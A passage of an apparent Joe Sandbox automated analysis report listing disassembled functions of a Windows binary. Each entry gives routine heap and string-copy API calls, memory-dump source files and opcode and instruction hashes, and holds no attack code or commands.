                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: string too long
                        • API String ID: 909987262-2556327735
                        • Opcode ID: f85afead9eccffc6280cc17961e3b67796b57a430f93228212b3c6db0f8b2b61
                        • Instruction ID: 4f1c8bf26af320eca7edf5a6f050ae7f945bfa744139a7df08963b5eb9491094
                        • Opcode Fuzzy Hash: f85afead9eccffc6280cc17961e3b67796b57a430f93228212b3c6db0f8b2b61
                        • Instruction Fuzzy Hash: CC3116723082004BE721DD6CF88096BF3E9EF92752B20453BF9428B742D7759C4983AD
                        Function 00446EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00446F74
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00446F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID: @
                        • API String ID: 1357844191-2766056989
                        • Opcode ID: c13daa9b67c36f3690c0128e45cd6ebd32e08e913cf158a9d275d8a6f942887c
                        • Instruction ID: 112aa1b811bd19957548516ed96ca5e893437823b1266f981fc7f3ec3bd00207
                        • Opcode Fuzzy Hash: c13daa9b67c36f3690c0128e45cd6ebd32e08e913cf158a9d275d8a6f942887c
                        • Instruction Fuzzy Hash: 9D2181B06006019BFB248F24DC80BB773E8FB45704F44486DF986CB684E779E949C755
                        Function 00461570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 004615A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 004615D9
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461611
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461649
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 4f5829bb21b973d403e9c97d0fab5e4c6f0f6e4751fe2f23335769faca504cab
                        • Instruction ID: fce30a79a16579a541b701140738e6608f94203a8d0616010ba37096353c3c9a
                        • Opcode Fuzzy Hash: 4f5829bb21b973d403e9c97d0fab5e4c6f0f6e4751fe2f23335769faca504cab
                        • Instruction Fuzzy Hash: 26210AB4601B029BD724DF3AD954A17F7F5AF44700B48491EA887C7B50EB78E841CBA9
                        Function 00441530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000), ref: 0044162D
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000,?), ref: 0044164F
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000,?), ref: 00441671
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000,?), ref: 00441693
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441557
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441579
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                        • lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 7bbc27fa2e376f02077ef0d64837021bc3843cc066dc9ede4e67802d8beb8bb2
                        • Instruction ID: 7201a659b84309c7829f48a65a27367d6814f82930bd4144dba5818b131a75b6
                        • Opcode Fuzzy Hash: 7bbc27fa2e376f02077ef0d64837021bc3843cc066dc9ede4e67802d8beb8bb2
                        • Instruction Fuzzy Hash: 1831D6B4A01B02AFD728DF3AC588953BBE5BF48305740492EA896C3B20DB74F851CB94
                        Function 00441610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 0044162D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044164F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441671
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 3a93630762ccb67b03558d692bd049537ec84e82fd247489dd9c0715de0d8c99
                        • Instruction ID: 14a98dc478443f894919c7dda0453c119a65561b1d2907f854b47e8e9ae01021
                        • Opcode Fuzzy Hash: 3a93630762ccb67b03558d692bd049537ec84e82fd247489dd9c0715de0d8c99
                        • Instruction Fuzzy Hash: 851133B4A117039BE7249F36D90C927B7F9FF44305749052EA496C3B60EB38E891CB64